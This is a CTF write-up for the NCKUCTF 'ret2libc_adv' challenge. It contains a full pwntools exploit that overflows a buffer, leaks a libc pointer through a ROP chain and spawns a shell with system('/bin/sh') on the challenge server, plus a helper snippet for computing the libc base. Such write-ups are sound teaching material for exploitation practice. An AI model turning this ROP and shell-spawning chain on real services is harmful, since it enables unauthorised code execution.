NCKUCTF ret2libc_adv WriteUp

Chihhh Linnn 香菇頭

ret2libc_adv

After overflowing with b'a'*0x28, write the leak chain, then return to main and use the functions in libc.
Because this challenge uses lazy binding, we cannot use printf to leak the base address.
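Two things the write-up relies on are worth seeing in isolation: why lazy binding rules out an unresolved GOT entry as a leak source, and how the 6 bytes that puts prints are turned into the libc base. The snippet below is an added example, not part of the original write-up; it uses the puts offset 0x80e50 from the exploit and a constructed leak value, and the binary address range used to classify GOT slots is an assumption for illustration.

```python
import struct

# Offset of puts inside the libc used by the write-up (0x80e50).
PUTS_OFFSET = 0x80e50
PAGE = 0x1000


def leak_to_addr(raw):
    """Pad a short little-endian leak (puts stops at the first NUL, so
    a userland pointer arrives as 6 bytes) to 8 bytes and unpack it."""
    if not 1 <= len(raw) <= 8:
        raise ValueError("expected 1..8 leaked bytes, got %d" % len(raw))
    return struct.unpack("<Q", raw.ljust(8, b"\0"))[0]


def libc_base(leaked_puts, puts_offset=PUTS_OFFSET):
    """Subtract the symbol offset and sanity-check the result: a mapping
    base must be page-aligned, so a misaligned value means the wrong libc
    build or a corrupted leak."""
    base = leaked_puts - puts_offset
    if base & (PAGE - 1):
        raise ValueError("base 0x%x is not page-aligned; wrong libc or bad leak" % base)
    return base


def got_resolved(got_value, elf_lo=0x400000, elf_hi=0x405000):
    """Under lazy binding a GOT slot initially points back into the
    binary's own PLT stub and only holds a libc pointer after the first
    call. The ELF range here is an assumed placeholder for a small
    non-PIE binary like the one in the write-up."""
    return not (elf_lo <= got_value < elf_hi)


# Constructed sample: what puts(print_got) would emit for an already
# resolved puts slot in a libc mapped at 0x7f1234500000.
SAMPLE_LEAK = struct.pack("<Q", 0x7f1234580e50)[:6]

if __name__ == "__main__":
    addr = leak_to_addr(SAMPLE_LEAK)
    print("leaked puts  -> %#x" % addr)
    print("libc base    -> %#x" % libc_base(addr))
    print("PLT-stub slot resolved? %s" % got_resolved(0x401030))
```

The resolved/unresolved check is the reason the exploit leaks puts rather than printf: the program has already printed its menu through puts, so that slot holds a real libc pointer, while printf has not been called and its slot still points at the PLT stub.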

Exploitation

from pwn import *

context.arch = 'amd64'

# r = process('./chal')
l = ELF("/root/pwn/ctf/libc.so.6")
r = remote('chall.nckuctf.org', 10010)

# overflow with 0x28
pop_rdi = 0x401463
print_got = 0x404018
puts_plt = 0x4010a0
main = 0x4011f6
ret = 0x40101a
leave_ret = 0x4013f1

# Stage 1: leak a libc pointer via puts(print_got), then return to main
p = flat(
    b'a'*0x28,
    ret,
    pop_rdi,
    print_got,
    puts_plt,
    ret,
    main
)

r.sendlineafter(b'Exit\n', b'3')
r.sendlineafter(b'go!\n', p)

# puts prints a 6-byte pointer; pad to 8 bytes and subtract the symbol offset
l.address = u64(r.recv(6).ljust(8, b"\0")) - 0x80e50
success("base address -> %s" % hex(l.address))

# Stage 2: system("/bin/sh") using addresses rebased against the leaked libc
binsh = next(l.search(b"/bin/sh\0"))
print(hex(binsh))
p2 = flat(b"a" * 0x28, pop_rdi, binsh, ret, l.sym.system)

r.sendlineafter(b'Exit\n', b'3')
r.sendlineafter(b'go!\n', p2)

r.sendline(b'cat /home/$(whoami)/flag*')

r.interactive()
  • Title: NCKUCTF ret2libc_adv WriteUp
  • Author: Chihhh Linnn
  • Created at: 2024-08-11 21:55:38
  • Updated at: 2024-08-11 21:55:38
  • Link: https://chihhhs.github.io/2024/08/11/ncku/
  • License: This work is licensed under CC BY-NC-SA 4.0.